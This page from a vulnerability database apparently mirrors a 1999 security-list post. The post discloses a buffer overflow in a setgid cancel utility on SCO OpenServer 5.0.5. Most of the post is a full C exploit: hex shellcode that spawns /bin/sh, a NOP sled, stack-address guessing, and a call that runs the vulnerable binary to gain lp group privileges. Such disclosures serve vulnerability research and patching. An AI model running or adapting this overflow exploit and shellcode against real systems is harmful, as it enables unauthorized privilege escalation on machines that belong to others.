Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

SCO_OpenServer_exploit.txt

🗓️ 15 Oct 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

User gaining lp privileges via overflow in SCO Unix 5.0.5 cancel command exploitation.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Greetings,  
  
OK, I lied about being done with my OpenServer audit. I have a couple of  
these left over, mostly because they weren't root-compromises.  
  
There is an overflow in /opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel  
which will allow any user to gain lp privs. Note that this is NOT an overflow  
in /usr/bin/cancel or /usr/lpd/remote/cancel.  
  
scohack:/home/btellier$ l  
/opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel; l /usr/bin/cancel; l  
/usr/lpd/remote/cancel;  
---x--s--x 1 bin lp 57472 Jan 28 1999  
/opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel  
---x--s--x 1 bin lp 2604 Feb 15 1999 /usr/bin/cancel@  
-rws--s--x 1 root daemon 27504 Jan 28 1999 /usr/lpd/remote/cancel@   
  
  
It is equivalent to /usr/lpd/local/cancel, but both are only sgid lp.  
  
Brock Tellier  
UNIX Systems Administrator  
  
  
  
  
--- sco_cancel.c ---  
  
/**  
** sco_cancel.c yields egid=18(lp)  
** Tested on SCO 5.0.5+Skunkware98  
**   
** Compile gcc -o sco_cancelx.c sco_cancelx.c   
**  
** Brock Tellier [email protected]  
**   
**/   
  
  
#include <stdlib.h>  
#include <stdio.h>  
  
char scoshell[]= /* [email protected] */  
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"  
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"  
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";  
  
  
#define LEN 1500  
#define NOP 0x90  
  
unsigned long get_sp(void) {  
  
__asm__("movl %esp, %eax");  
  
}  
  
  
int main(int argc, char *argv[]) {  
  
long int offset=0;  
  
int i;  
int buflen = LEN;  
long int addr;  
char buf[LEN];  
  
if(argc > 3) {  
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);  
exit(0);   
}  
else if (argc == 2){  
offset=atoi(argv[1]);  
  
}  
else if (argc == 3) {  
offset=atoi(argv[1]);  
buflen=atoi(argv[2]);   
  
}  
else {  
offset=600;  
buflen=1200;  
  
}  
  
  
addr=get_sp();  
  
fprintf(stderr, "\nSCO 5.0.5 cancel exploit yields egid=18(lp)\n");  
fprintf(stderr, "Brock Tellier [email protected]\n\n");  
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);  
  
memset(buf,NOP,buflen);  
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));  
for(i=((buflen/2) + strlen(scoshell))+1;i<buflen-4;i+=4)  
*(int *)&buf[i]=addr+offset;  
  
execl("/opt/K/SCO/Unix/5.0.5Eb/.softmgmt/var/usr/bin/cancel", "cancel", buf,  
NULL);  
  
exit(0);  
}  
  
------  
  
____________________________________________________________________  
Get free email and a permanent address at http://www.netaddress.com/?N=1  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Oct 1999 00:00Current
sco unixprivilege escalationcancel commandoverflow vulnerabilitybrock tellier.
25
.json
Report